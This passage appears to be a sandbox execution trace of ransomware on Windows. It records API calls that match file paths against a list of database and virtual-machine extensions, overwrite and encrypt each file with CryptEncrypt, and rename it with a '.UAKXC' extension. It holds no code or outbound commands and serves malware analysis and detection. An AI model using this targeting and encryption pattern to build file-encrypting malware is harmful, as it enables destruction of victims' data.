Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abx") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdw") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adn") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db2") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fm5") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".hjt") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".icg") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".icr") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kdb") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lut") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maw") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdn") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdt") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vdi") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vhd") returned 0x0 [0159.564] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmdk") returned 0x0 [0159.565] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pvm") returned 0x0 [0159.565] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmem") returned 0x0 [0159.565] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmsn") returned 0x0 [0159.565] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmsd") returned 0x0 [0159.565] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nvram") returned 0x0 [0159.565] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmx") returned 0x0 [0159.565] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".raw") returned 0x0 [0159.565] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qcow2") returned 0x0 [0159.565] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".subvol") returned 0x0 [0159.565] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".bin") returned 0x0 [0159.565] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vsv") returned 0x0 [0159.565] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".avhd") returned 0x0 [0159.565] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmrs") returned 0x0 [0159.565] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vhdx") returned 0x0 [0159.565] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".avdx") returned 0x0 [0159.565] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmcx") returned 0x0 [0159.565] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".iso") returned 0x0 [0159.565] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.565] WriteFile (in: hFile=0x714, lpBuffer=0x383fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x383fc78, lpOverlapped=0x0 | out: lpBuffer=0x383fd70*, lpNumberOfBytesWritten=0x383fc78*=0x20c, lpOverlapped=0x0) returned 1 [0159.567] WriteFile (in: hFile=0x714, lpBuffer=0x383fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x383fc7c, lpOverlapped=0x0 | out: lpBuffer=0x383fc80*, lpNumberOfBytesWritten=0x383fc7c*=0xa, lpOverlapped=0x0) returned 1 [0159.567] SetEndOfFile (hFile=0x714) returned 1 [0159.567] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.567] ReadFile (in: hFile=0x714, lpBuffer=0x4610000, nNumberOfBytesToRead=0x73c, lpNumberOfBytesRead=0x383fc88, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc88*=0x73c, lpOverlapped=0x0) returned 1 [0159.567] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0xfffff8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.567] WriteFile (in: hFile=0x714, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x73c, lpNumberOfBytesWritten=0x383fc44, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc44*=0x73c, lpOverlapped=0x0) returned 1 [0159.568] CloseHandle (hObject=0x714) returned 1 [0159.568] GetProcessHeap () returned 0xea0000 [0159.568] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77950d0 [0159.569] lstrcpyW (in: lpString1=0x77950d0, lpString2="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" [0159.569] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".UAKXC" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC") returned="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC" [0159.569] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.uakxc")) returned 1 [0159.569] GetProcessHeap () returned 0xea0000 [0159.569] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77950d0 | out: hHeap=0xea0000) returned 1 [0159.569] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef61f0 | out: hHeap=0xea0000) returned 1 [0159.569] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2b78 | out: hHeap=0xea0000) returned 1 [0159.569] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0159.569] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0159.570] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0159.570] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0159.571] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x714 [0159.571] GetLastError () returned 0x0 [0159.571] GetFileSizeEx (in: hFile=0x714, lpFileSize=0x383fc88 | out: lpFileSize=0x383fc88*=6241) returned 1 [0159.571] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".4dd") returned 0x0 [0159.571] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".4dl") returned 0x0 [0159.571] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdb") returned 0x0 [0159.571] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdc") returned 0x0 [0159.571] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accde") returned 0x0 [0159.571] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdr") returned 0x0 [0159.572] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdt") returned 0x0 [0159.572] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accft") returned 0x0 [0159.572] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adb") returned 0x0 [0159.572] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ade") returned 0x0 [0159.572] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adf") returned 0x0 [0159.572] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adp") returned 0x0 [0159.572] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".arc") returned 0x0 [0159.572] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ora") returned 0x0 [0159.572] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".alf") returned 0x0 [0159.572] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ask") returned 0x0 [0159.572] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".btr") returned 0x0 [0159.572] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".bdf") returned 0x0 [0159.572] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cat") returned 0x0 [0159.572] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cdb") returned 0x0 [0159.572] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ckp") returned 0x0 [0159.572] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cma") returned 0x0 [0159.572] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".cpd") returned 0x0 [0159.572] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dacpac") returned 0x0 [0159.573] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dad") returned 0x0 [0159.573] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dadiagrams") returned 0x0 [0159.573] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".daschema") returned 0x0 [0159.573] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db") returned 0x0 [0159.573] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db-shm") returned 0x0 [0159.573] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db-wal") returned 0x0 [0159.573] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db3") returned 0x0 [0159.573] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbc") returned 0x0 [0159.573] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbf") returned 0x0 [0159.573] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbs") returned 0x0 [0159.573] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbt") returned 0x0 [0159.573] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbv") returned 0x0 [0159.573] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dbx") returned 0x0 [0159.573] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dcb") returned 0x0 [0159.573] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dct") returned 0x0 [0159.573] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dcx") returned 0x0 [0159.573] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ddl") returned 0x0 [0159.573] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dlis") returned 0x0 [0159.573] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dp1") returned 0x0 [0159.573] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dqy") returned 0x0 [0159.573] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dsk") returned 0x0 [0159.573] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dsn") returned 0x0 [0159.573] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dtsx") returned 0x0 [0159.573] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".dxl") returned 0x0 [0159.573] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".eco") returned 0x0 [0159.574] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ecx") returned 0x0 [0159.574] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".edb") returned 0x0 [0159.574] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".epim") returned 0x0 [0159.574] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".exb") returned 0x0 [0159.574] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fcd") returned 0x0 [0159.574] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fdb") returned 0x0 [0159.574] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fic") returned 0x0 [0159.574] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmp") returned 0x0 [0159.574] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmp12") returned 0x0 [0159.574] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fmpsl") returned 0x0 [0159.574] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fol") returned 0x0 [0159.574] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp3") returned 0x0 [0159.574] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp4") returned 0x0 [0159.574] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp5") returned 0x0 [0159.574] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fp7") returned 0x0 [0159.574] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fpt") returned 0x0 [0159.574] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".frm") returned 0x0 [0159.574] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".gdb") returned 0x0 [0159.574] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".grdb") returned 0x0 [0159.574] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".gwi") returned 0x0 [0159.574] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".hdb") returned 0x0 [0159.574] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".his") returned 0x0 [0159.574] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ib") returned 0x0 [0159.574] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".idb") returned 0x0 [0159.574] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ihx") returned 0x0 [0159.574] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".itdb") returned 0x0 [0159.575] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".itw") returned 0x0 [0159.575] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".jet") returned 0x0 [0159.575] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".jtx") returned 0x0 [0159.575] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kdb") returned 0x0 [0159.575] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexi") returned 0x0 [0159.575] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexic") returned 0x0 [0159.575] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kexis") returned 0x0 [0159.575] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lgc") returned 0x0 [0159.575] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lwx") returned 0x0 [0159.575] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maf") returned 0x0 [0159.575] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maq") returned 0x0 [0159.575] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mar") returned 0x0 [0159.575] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mas") returned 0x0 [0159.575] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mav") returned 0x0 [0159.575] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdb") returned 0x0 [0159.575] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdf") returned 0x0 [0159.575] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mpd") returned 0x0 [0159.575] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mrg") returned 0x0 [0159.575] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mud") returned 0x0 [0159.575] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mwb") returned 0x0 [0159.575] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".myd") returned 0x0 [0159.575] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ndf") returned 0x0 [0159.575] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nnt") returned 0x0 [0159.575] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nrmlib") returned 0x0 [0159.575] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns2") returned 0x0 [0159.575] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns3") returned 0x0 [0159.576] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".ns4") returned 0x0 [0159.576] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nsf") returned 0x0 [0159.576] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nv") returned 0x0 [0159.576] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nv2") returned 0x0 [0159.576] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nwdb") returned 0x0 [0159.576] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nyf") returned 0x0 [0159.576] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".odb") returned 0x0 [0159.576] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".oqy") returned 0x0 [0159.576] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".orx") returned 0x0 [0159.576] StrStrIW 